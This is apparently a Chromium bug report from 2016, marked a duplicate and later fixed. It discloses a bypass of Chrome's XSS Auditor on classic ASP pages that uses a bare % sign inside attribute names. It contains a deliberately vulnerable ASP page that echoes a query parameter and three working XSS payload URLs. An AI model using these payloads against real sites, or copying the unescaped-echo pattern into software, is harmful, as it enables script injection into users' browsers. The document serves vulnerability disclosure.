XSS Filter Bypass for ASP pages by using single % sign
Reported by
ad...@outlook.com,
Sep 6 2016
|
||
Issue descriptionUserAgent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 Steps to reproduce the problem: This issue was already fixed in issue 613689, but it is reported here again because the original report contains sensitive information that prevents the disclosure (security-embargo label). Please close as duplicate of 613689. Thanks. XSS Filter can be bypassed when the vulnerable page is an classic ASP file by using simply a percent sign (%). There are several examples of vulnerable ASP pages which can be exploited. "Layer 1: Http.sys (blocked characters = '%'). Http.sys parses URLs in accordance with RFC 2396. You can however configure exceptions using the AllowRestrictedChars registry setting documented in KB 820129. This configuration will never allow a bare ‘%’ character though because it is expressly forbidden in the RFC section 2.4.2 which says: “Because the percent "%" character always has the reserved purpose of being the escape indicator, it must be escaped as "%25" in order to be used as data within a URI. Implementers should be careful not to escape or unescape the same string more than once, since unescaping an already unescaped string might lead to misinterpreting a percent data character as another escaped character, or vice versa in the case of escaping an already escaped string." Source: http://blogs.iis.net/nazim/use-of-special-characters-like-in-an-iis-url *** PoC *** [Environment] Windows 8.1 64bits Chrome Version: 50.0.2661.102 stable Microsoft-IIS/8.5 Classic ASP Default IIS web site without modifications. [Code] <html> <head> <title>Google Chrome XSS Auditor Bypass % sign</title> </head> <body> <% Response.Write(Request.QueryString("xss")) %> </body> </html> [Exploit] http://localhost/Default.asp?xss=<img src=x on%error=alert(document.domain)> http://localhost/Default.asp?xss=<script s%rc="data:application/javascript,console.log(alert(document.domain));"></script> http://localhost/Default.asp?xss=<object d%ata="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2b"></object> Adriano Marcio Monteiro adriano@brztec.com @adrianomarcmont www.brztec.com What is the expected behavior? What went wrong? <html> <head> <title>Google Chrome XSS Auditor Bypass % sign</title> </head> <body> <% Response.Write(Request.QueryString("xss")) %> </body> </html> Did this work before? No Chrome version: 50.0.2661.102 stable Channel: stable OS Version: 6.3 Flash Version: Shockwave Flash 22.0 r0
,
Aug 3 2017
Hi @tsepez! Do you can remove "SecurityTeam permission" and enable this report to public?
,
Aug 3 2017
,
Aug 3 2017
FYI, https://crrev.com/ed036799ce1e2973f98104e57566e2b8fe774c72 was a while ago. |
||
►
Sign in to add a comment |
||
Comment 1 by tsepez@chromium.org
, Sep 6 2016Mergedinto: 613689
Status: Duplicate (was: Unconfirmed)